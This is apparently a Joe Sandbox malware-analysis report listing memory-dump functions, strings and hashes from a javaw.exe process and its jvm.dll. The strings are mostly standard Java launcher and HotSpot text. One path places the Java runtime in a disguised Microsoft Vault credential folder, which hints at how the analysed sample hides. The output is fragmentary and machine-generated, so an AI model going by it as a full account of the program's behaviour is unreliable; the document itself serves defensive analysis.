Associated: 00000010.00000002.3209165683.000000006FB3E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209188887.000000006FB3F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209217085.000000006FB40000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209241179.000000006FB43000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6fa70000_javaw.jbxd

Similarity

API ID: memcmp
String ID: ance$ate$ence$ful$iti$ive$ize$ous
API String ID: 1475443563-285752282
Opcode ID: e1a81eb18446474da3b7dc8f255512ca7960374c7178708b80fb1438a2097916
Instruction ID: 77821b8a00312d51587d190760294f9b6c35df378b19464ca8ac20bf0af6bfe9
Opcode Fuzzy Hash: e1a81eb18446474da3b7dc8f255512ca7960374c7178708b80fb1438a2097916
Instruction Fuzzy Hash: 48F148B0D193468FDB00CF18C5846AEBBF4AF45354F15844ADCA99B344E7B9E886CF62

Function 00E0378F Relevance: 29.9, APIs: 5, Strings: 12, Instructions: 147COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00E03884
_strlen.LIBCMT ref: 00E0388C
_strlen.LIBCMT ref: 00E0389E
GetCurrentProcessId.KERNEL32(00000000,00000000,?,?,00E29228,?,00E01EBF,?,?), ref: 00E038B5
GetCurrentProcessId.KERNEL32(-0000000A,?,?,00E29228,?,00E01EBF,?,?,?,?,?,?,?,?,?,00E29228), ref: 00E038EB

Strings

-jar, xrefs: 00E03840
%s%d, xrefs: 00E038F7
TRACER_MARKER: NativeMemoryTracking: putenv arg %s, xrefs: 00E03912
%s%d=%s, xrefs: 00E038C5
-version, xrefs: 00E037EC
TRACER_MARKER: NativeMemoryTracking: env var is %s, xrefs: 00E03904
-help, xrefs: 00E03816
-cp, xrefs: 00E037B9
TRACER_MARKER: NativeMemoryTracking: got value %s, xrefs: 00E03923
-fullversion, xrefs: 00E03801
-XX:NativeMemoryTracking=, xrefs: 00E0386A, 00E0387F
-classpath, xrefs: 00E037CE

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: _strlen$CurrentProcess
String ID: %s%d$%s%d=%s$-XX:NativeMemoryTracking=$-classpath$-cp$-fullversion$-help$-jar$-version$TRACER_MARKER: NativeMemoryTracking: env var is %s$TRACER_MARKER: NativeMemoryTracking: got value %s$TRACER_MARKER: NativeMemoryTracking: putenv arg %s
API String ID: 84547671-1766480102
Opcode ID: 6b4188cfd8dc54838a7e5a91301a00149c6310c3e8d549aa7c3505d07bfd6fb2
Instruction ID: cad975b1482c94bb1a922fd8189f3c504fa076afb8d880db7eaa6169b34482b9
Opcode Fuzzy Hash: 6b4188cfd8dc54838a7e5a91301a00149c6310c3e8d549aa7c3505d07bfd6fb2
Instruction Fuzzy Hash: 4331D3B264A7223AEA293A747C43DAF53CC8E51764F18345AF400710C7EE959EC0817E

Function 00E058B4 Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 134registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\JavaSoft\Java Runtime Environment,00000000,00020019,?), ref: 00E058F1
RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00E05988
RegCloseKey.ADVAPI32 ref: 00E0593B

Part of subcall function 00E05AE8: __vsnprintf.LIBCMT ref: 00E05B1A
Part of subcall function 00E05AE8: MessageBoxA.USER32(00000000,00000000,Java Virtual Machine Launcher,00000010), ref: 00E05B30

RegCloseKey.ADVAPI32 ref: 00E05A38
RegCloseKey.ADVAPI32 ref: 00E05A3E

Part of subcall function 00E05A5B: RegQueryValueExA.ADVAPI32 ref: 00E05A73
Part of subcall function 00E05A5B: RegQueryValueExA.ADVAPI32 ref: 00E05A9A

Strings

Software\JavaSoft\Java Runtime Environment, xrefs: 00E058E6, 00E058EB, 00E058F7, 00E0592A, 00E05964, 00E05993, 00E059C5
Warning: Can't read MicroVersion, xrefs: 00E05A00
CurrentVersion, xrefs: 00E05915
MicroVersion, xrefs: 00E059EB
Failed reading value of registry key:%s\%s\JavaHome, xrefs: 00E059C6
Error: Registry key '%s'\CurrentVersion'has value '%s', but '%s' is required., xrefs: 00E05965
Error: Failed reading value of registry key:%s\CurrentVersion, xrefs: 00E0592B
Version major.minor.micro = %s.%s, xrefs: 00E05A1F
Error: opening registry key '%s', xrefs: 00E058F8, 00E05994
JavaHome, xrefs: 00E059AB

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: Close$OpenQueryValue$Message__vsnprintf
String ID: CurrentVersion$Error: Failed reading value of registry key:%s\CurrentVersion$Error: Registry key '%s'\CurrentVersion'has value '%s', but '%s' is required.$Error: opening registry key '%s'$Failed reading value of registry key:%s\%s\JavaHome$JavaHome$MicroVersion$Software\JavaSoft\Java Runtime Environment$Version major.minor.micro = %s.%s$Warning: Can't read MicroVersion
API String ID: 1167018405-1407590046
Opcode ID: 893ba74eb51657fd88ff06301449402dd9413e713a5bee69571d616a34312e9a
Instruction ID: c62595701d8703184b8d01feaff43422f8c8fb74eedad0ee92615505045212cf
Opcode Fuzzy Hash: 893ba74eb51657fd88ff06301449402dd9413e713a5bee69571d616a34312e9a
Instruction Fuzzy Hash: B0410973644309BFDB10AB50EC82DEB77ECEF85714F44282AF554B20D2E66199898E73

Function 00E01D6F Relevance: 24.8, APIs: 6, Strings: 8, Instructions: 287COMMON

Download Yara Rule

APIs

Part of subcall function 00E05AAD: InitCommonControlsEx.COMCTL32(00000008), ref: 00E05ACD

_strlen.LIBCMT ref: 00E01FED
_strlen.LIBCMT ref: 00E01FF6
_strlen.LIBCMT ref: 00E02003
_strlen.LIBCMT ref: 00E0204D
_strlen.LIBCMT ref: 00E02062
_strlen.LIBCMT ref: 00E02079

Strings

-Dsun.java.command=, xrefs: 00E02074, 00E02089
%ld micro seconds to LoadJavaVM, xrefs: 00E01F28
-Dsun.java.launcher.diag=true, xrefs: 00E01E53
Command line args:, xrefs: 00E01E1C
CLASSPATH, xrefs: 00E01F80
argv[%d] = %s, xrefs: 00E01E3A
-Djava.class.path=%s, xrefs: 00E02014
-Dsun.java.launcher=SUN_STANDARD, xrefs: 00E020D7

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: _strlen$CommonControlsInit
String ID: %ld micro seconds to LoadJavaVM$-Djava.class.path=%s$-Dsun.java.command=$-Dsun.java.launcher.diag=true$-Dsun.java.launcher=SUN_STANDARD$CLASSPATH$Command line args:$argv[%d] = %s
API String ID: 159647867-2771535488
Opcode ID: 0f74e4953b4c4ba0ba4b6cb08d0e3f13d39c4f7e45eb866b56cd17e58fa0dfa9
Instruction ID: ee1ce67adb67de4de5edb3c14b45fa1c388a18730dcdbd26bdcc1f5ac8c65704
Opcode Fuzzy Hash: 0f74e4953b4c4ba0ba4b6cb08d0e3f13d39c4f7e45eb866b56cd17e58fa0dfa9
Instruction Fuzzy Hash: A1A1F972508340AFC721EF64DC46E9FB7EDAF88304F14285DF584B7192EB319A858B62

Function 00E01512 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 136COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00E01556
_strlen.LIBCMT ref: 00E0155F
_strlen.LIBCMT ref: 00E0156C
_strlen.LIBCMT ref: 00E015BF
_strlen.LIBCMT ref: 00E015FD
_strlen.LIBCMT ref: 00E01609
_strcat.LIBCMT ref: 00E0162D
_strlen.LIBCMT ref: 00E01667

Strings

Error: Could not determine application home., xrefs: 00E015A7
-Denv.class.path=%s, xrefs: 00E0157C
-Dapplication.home=%s, xrefs: 00E015D3
;, xrefs: 00E01539
CLASSPATH, xrefs: 00E01530
-Djava.class.path=, xrefs: 00E01625

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: _strlen$_strcat
String ID: -Dapplication.home=%s$-Denv.class.path=%s$-Djava.class.path=$;$CLASSPATH$Error: Could not determine application home.
API String ID: 1497175149-1246759518
Opcode ID: fb0590aa0aebb76db2c6e384ec9b33ef64f24373a8db8286f49df7b84616d558
Instruction ID: f3f142f42ccb6486e7ca9d1ac836c42e7f7778de42b89c800a1387a940f4ef9e
Opcode Fuzzy Hash: fb0590aa0aebb76db2c6e384ec9b33ef64f24373a8db8286f49df7b84616d558
Instruction Fuzzy Hash: DC41C2729043156BC620FBA4EC43EEF77DD9F84344F042869F640BB182EE6599C947A7

Function 6D5EA8F0 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 113COMMON

Download Yara Rule

Strings

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\client\jvm.dll, xrefs: 6D5EA908, 6D5EA914, 6D5EAA0E
\jre\bin\, xrefs: 6D5EA99D
JAVA_HOME, xrefs: 6D5EA944
hotspot\jvm.dll, xrefs: 6D5EA9E2
\bin\, xrefs: 6D5EA9BF

Memory Dump Source

Source File: 00000010.00000002.3208148704.000000006D411000.00000020.00000001.01000000.00000010.sdmp, Offset: 6D410000, based on PE: true

Associated: 00000010.00000002.3208123124.000000006D410000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208367361.000000006D6F6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208435880.000000006D796000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208465304.000000006D797000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208490609.000000006D798000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208513617.000000006D79A000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208537460.000000006D79C000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208563923.000000006D79D000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208588233.000000006D79E000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208611080.000000006D79F000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208636785.000000006D7A7000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208660137.000000006D7A9000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208690761.000000006D7AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208713812.000000006D7AE000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7B9000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7BC000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7CB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7D1000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208839052.000000006D7D7000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6d410000_javaw.jbxd

Similarity

API ID:
String ID: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\client\jvm.dll$JAVA_HOME$\bin\$\jre\bin\$hotspot\jvm.dll
API String ID: 0-1687454453
Opcode ID: 58f59f844663bdfe4939a1ce723a183b23692c1f7873ee83995ab4afbd5ed528
Instruction ID: fd28fe8cbcf3c761e1279ce6767bc48f11f0b071be09784af420f7f1f3703eba
Opcode Fuzzy Hash: 58f59f844663bdfe4939a1ce723a183b23692c1f7873ee83995ab4afbd5ed528
Instruction Fuzzy Hash: 36319D752041416BDF0A5E78E804FB53B399FC33A8F15C569E889CBA03D7338546C7A1

Function 6D413C40 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 191COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?), ref: 6D413D93
jio_snprintf.JVM(00000000,?,%s.class,?,?,00000000), ref: 6D413DD7

Strings

SKIP: %s, xrefs: 6D413D59
boot, xrefs: 6D413D25
%s.class, xrefs: 6D413DD0
app, xrefs: 6D413D17
Maybe, xrefs: 6D413E63
ext, xrefs: 6D413D1E, 6D413D2B
Arena::Amalloc_4, xrefs: 6D413C9D
is %4s loader able to load class %s ? -> , xrefs: 6D413D2C
other, xrefs: 6D413D10

Memory Dump Source

Source File: 00000010.00000002.3208148704.000000006D411000.00000020.00000001.01000000.00000010.sdmp, Offset: 6D410000, based on PE: true

Associated: 00000010.00000002.3208123124.000000006D410000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208367361.000000006D6F6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208435880.000000006D796000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208465304.000000006D797000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208490609.000000006D798000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208513617.000000006D79A000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208537460.000000006D79C000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208563923.000000006D79D000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208588233.000000006D79E000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208611080.000000006D79F000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208636785.000000006D7A7000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208660137.000000006D7A9000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208690761.000000006D7AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208713812.000000006D7AE000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7B9000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7BC000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7CB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7D1000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208839052.000000006D7D7000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6d410000_javaw.jbxd

Similarity

API ID: Valuejio_snprintf
String ID: %s.class$Arena::Amalloc_4$Maybe$SKIP: %s$app$boot$ext$is %4s loader able to load class %s ? -> $other
API String ID: 927349343-3963538833
Opcode ID: 9555c2d2728bcb7aa81ef07e39fe3a39672ebd19fa7774d0c2553e9ebbd81430
Instruction ID: 861268648d4c9a15f4d4667a188c15f9b4cbc3e782255b2d3f140eaa3e5303a3
Opcode Fuzzy Hash: 9555c2d2728bcb7aa81ef07e39fe3a39672ebd19fa7774d0c2553e9ebbd81430
Instruction Fuzzy Hash: 1451C171A486459FDF11CE68DC48FBAB7B5EB46204F24446DE925A7341E732EC02CB92

Function 6D528EB0 Relevance: 18.3, APIs: 1, Strings: 11, Instructions: 341COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000006), ref: 6D528EF6

Strings

WAITING.PARKED, xrefs: 6D52915D
TIMED_WAITING.OBJECT_WAIT, xrefs: 6D5291F3
TERMINATED, xrefs: 6D529294
RUNNABLE, xrefs: 6D529096
C:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\hotspot\src\share\vm\prims\jvm.cpp, xrefs: 6D528F34
TIMED_WAITING.SLEEPING, xrefs: 6D5291D2
Arena::Amalloc_4, xrefs: 6D528FDF
TIMED_WAITING.PARKED, xrefs: 6D52920F
WAITING.OBJECT_WAIT, xrefs: 6D52913C
BLOCKED, xrefs: 6D5290E9
NEW, xrefs: 6D529043

Memory Dump Source

Source File: 00000010.00000002.3208148704.000000006D411000.00000020.00000001.01000000.00000010.sdmp, Offset: 6D410000, based on PE: true

Associated: 00000010.00000002.3208123124.000000006D410000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208367361.000000006D6F6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208435880.000000006D796000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208465304.000000006D797000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208490609.000000006D798000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208513617.000000006D79A000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208537460.000000006D79C000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208563923.000000006D79D000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208588233.000000006D79E000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208611080.000000006D79F000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208636785.000000006D7A7000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208660137.000000006D7A9000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208690761.000000006D7AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208713812.000000006D7AE000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7B9000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7BC000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7CB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7D1000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208839052.000000006D7D7000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6d410000_javaw.jbxd

Similarity

API ID: Value
String ID: Arena::Amalloc_4$BLOCKED$C:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\hotspot\src\share\vm\prims\jvm.cpp$NEW$RUNNABLE$TERMINATED$TIMED_WAITING.OBJECT_WAIT$TIMED_WAITING.PARKED$TIMED_WAITING.SLEEPING$WAITING.OBJECT_WAIT$WAITING.PARKED
API String ID: 3702945584-3098376452
Opcode ID: 0ee2f2ae0b2a1d9d6b898e9889ecba6d9332f78e94737e55323f0ed3445b8f84
Instruction ID: bd5516ae6219ad1c7f66da5c3a7157742c250ff0d3b61db2c7fbe4a202d0f7ee
Opcode Fuzzy Hash: 0ee2f2ae0b2a1d9d6b898e9889ecba6d9332f78e94737e55323f0ed3445b8f84
Instruction Fuzzy Hash: 2BC1C171908206AFDB24CF94DC80FAAB7B9FF45314F05482DEA05A7790D731AD58CBA2

Function 00E04E35 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 209COMMON

Download Yara Rule

Strings

Error: A JNI error has occurred, please check your installation and try again, xrefs: 00E05087
expandArgs, xrefs: 00E04FFF
([Ljava/lang/String;)[Ljava/lang/String;, xrefs: 00E04FFA
%c%s, xrefs: 00E04F9C
passing arguments as-is., xrefs: 00E04EA9
%s, xrefs: 00E04FBE
Warning: app args is larger than the original, %d %d, xrefs: 00E04E9F
Warning: app args parsing error, xrefs: 00E04EE6

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID:
String ID: %c%s$%s$([Ljava/lang/String;)[Ljava/lang/String;$Error: A JNI error has occurred, please check your installation and try again$Warning: app args is larger than the original, %d %d$Warning: app args parsing error$expandArgs$passing arguments as-is.
API String ID: 0-172679050
Opcode ID: 3b3b40b3b1901adeea88ac51e504612256e0105939324e2f2ae5bb9c2e5119b8
Instruction ID: 7c60b6c7630782d75c9c75f0f98fb93baf06174ded395ad79a7c84bfd7e69eb5
Opcode Fuzzy Hash: 3b3b40b3b1901adeea88ac51e504612256e0105939324e2f2ae5bb9c2e5119b8
Instruction Fuzzy Hash: A5611672508341AFD704EF649841C6FBBE5EF88354F14286DF584BB2D2DA31D985CBA2

Function 00E0D001 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00E0D120
___TypeMatch.LIBVCRUNTIME ref: 00E0D22E
_UnwindNestedFrames.LIBCMT ref: 00E0D380
CallUnexpected.LIBVCRUNTIME ref: 00E0D39B

Strings

\D, xrefs: 00E0D117
csm, xrefs: 00E0D157
csm, xrefs: 00E0D0AB
csm, xrefs: 00E0D03E

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: \D$csm$csm$csm
API String ID: 2751267872-4147161843
Opcode ID: 7c37a61882052391b91d50564a91e35bbf4deb2210b1a5d696f78f2878bfd6a5
Instruction ID: 91f8038dd21222662fa4cd9f34719de60b7aa2e634ee89de97a3d64d1c0f4f8b
Opcode Fuzzy Hash: 7c37a61882052391b91d50564a91e35bbf4deb2210b1a5d696f78f2878bfd6a5
Instruction Fuzzy Hash: 77B16771808209EFCF25DFE4DC81AAEBBB5EF14314B14615AE8047B292D735DA91CF92

Function 6D5E5DB0 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 164stringsynchronizationCOMMON

Download Yara Rule

APIs

strstr.VCRUNTIME140(?,\\.\pipe\), ref: 6D5E5E5B
WaitForSingleObject.KERNEL32(000000FF), ref: 6D5E5E73

Strings

\\.\pipe\, xrefs: 6D5E5E55
invariant, xrefs: 6D5E5F4A
C:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\hotspot\src\os\windows\vm\attachListener_windows.cpp, xrefs: 6D5E5F59
guarantee(not_exceeding_semaphore_maximum_count) failed, xrefs: 6D5E5F4F

Memory Dump Source

Source File: 00000010.00000002.3208148704.000000006D411000.00000020.00000001.01000000.00000010.sdmp, Offset: 6D410000, based on PE: true

Associated: 00000010.00000002.3208123124.000000006D410000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208367361.000000006D6F6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208435880.000000006D796000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208465304.000000006D797000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208490609.000000006D798000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208513617.000000006D79A000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208537460.000000006D79C000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208563923.000000006D79D000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208588233.000000006D79E000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208611080.000000006D79F000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208636785.000000006D7A7000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208660137.000000006D7A9000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208690761.000000006D7AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208713812.000000006D7AE000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7B9000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7BC000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7CB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7D1000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208839052.000000006D7D7000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6d410000_javaw.jbxd

Similarity

API ID: ObjectSingleWaitstrstr
String ID: C:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\hotspot\src\os\windows\vm\attachListener_windows.cpp$\\.\pipe\$guarantee(not_exceeding_semaphore_maximum_count) failed$invariant
API String ID: 3344435132-4053478451
Opcode ID: 8be5b78c14461665ed2a668c6c3579a21fed145ef2de0519abd55b46304426d2
Instruction ID: f6522f9a47126205988992830b8532acbade4ebcd1e28ebe9e54b1b977a481f4
Opcode Fuzzy Hash: 8be5b78c14461665ed2a668c6c3579a21fed145ef2de0519abd55b46304426d2
Instruction Fuzzy Hash: A55107742082469FCF0DDE28D8507B8FB72EF46388F248AEDE8569BE41D7325506CB91

Function 6D5880D0 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 83COMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,00000000,00000000), ref: 6D58817A

Strings

invariant, xrefs: 6D5880DC, 6D588135, 6D588186
C:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\hotspot\src\share\vm\runtime\park.cpp, xrefs: 6D5880E8, 6D588144
guarantee(t != NULL) failed, xrefs: 6D5880E1
ParkerFreeListAllocate, xrefs: 6D5880F6
C:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\hotspot\src\os\windows\vm\os_windows.hpp, xrefs: 6D588195
guarantee(p->AssociatedWith == NULL) failed, xrefs: 6D58813A
guarantee(_ParkEvent != NULL) failed, xrefs: 6D58818B

Memory Dump Source

Source File: 00000010.00000002.3208148704.000000006D411000.00000020.00000001.01000000.00000010.sdmp, Offset: 6D410000, based on PE: true

Associated: 00000010.00000002.3208123124.000000006D410000.00000002.00000001.01000000.00000010.sdmpDownload File
